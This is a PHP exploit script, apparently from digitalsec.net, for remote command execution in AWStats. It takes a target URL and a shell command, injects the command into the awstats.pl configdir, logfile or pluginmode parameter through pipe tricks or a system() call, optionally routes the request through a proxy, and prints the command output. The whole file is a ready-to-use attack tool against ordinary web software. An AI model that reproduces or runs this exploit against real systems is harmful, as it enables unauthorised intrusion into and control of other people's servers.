#!/usr/bin/php -q
<?
/*
 * AWStats configdir exploit.
 * Support proxy.
 * !dSR - www.digitalsec.net 
 *  
 */

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

/*
 * Options are:
 * d - for directory (/cgi-bin/awstats.pl)
 * u - for url (http://url)
 * c - for command (id)
 * p - for proxy (ip:port)
 * 123 - for xploit.
 *   1 - configdir <- default
 *   2 - logfile
 *   3 - pluginmode
 */
$opt = getopt("d:u:c:p:123");
if (!$opt or !isset ($opt['u']) or !isset ($opt['c'])) {
    echo "Usage: ".$argv[0]." [-123] -u <url> -d <dir> -c <cmd> -p <proxy>\n\n";
    exit;
}

if (!isset($opt["d"])) {
	$dir = "/cgi-bin/awstats.pl";
} else {
	$dir = $opt["d"];
}

$url = $opt["u"];
$command = preg_replace ("/\ /","%20", $opt["c"]);
$ch = curl_init ();

if (isset($opt["p"])) 
	curl_setopt($ch, CURLOPT_PROXY, $opt["p"]);


$attack = $url.$dir."?configdir=|echo;echo%20MAGIC_QUOTE;".$command.";echo%20MAGIC_END";
if (isset($opt["1"])) {
	$attack = $url.$dir."?configdir=|echo;echo%20MAGIC_QUOTE;".$command.";echo%20MAGIC_END";	
}
if (isset($opt["2"])) { 
	$attack = $url.$dir."?update=1&logfile=|echo;echo+MAGIC_QUOTE;".$command.";echo+MAGIC_END;echo";
}
if (isset($opt["3"])) { 
	$attack = $url.$dir."?pluginmode=:system(\"echo%20MAGIC_QUOTE;".$command.";echo%20MAGIC_END\");";
}

curl_setopt($ch, CURLOPT_URL, $attack);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$res = curl_exec ($ch);
$res_array = split ("\n", $res);

foreach ($res_array as $ln) {
	if (preg_match ("/^Cache-Control.*/", $ln)) {
		exit;
	}
	if (preg_match ("/^MAGIC_QUOTE/", $ln)) {
		continue;
	}	
	if (preg_match ("/^MAGIC_END/", $ln)) {
		exit;
	}
	print "$ln\n";
}
curl_close($ch);
?>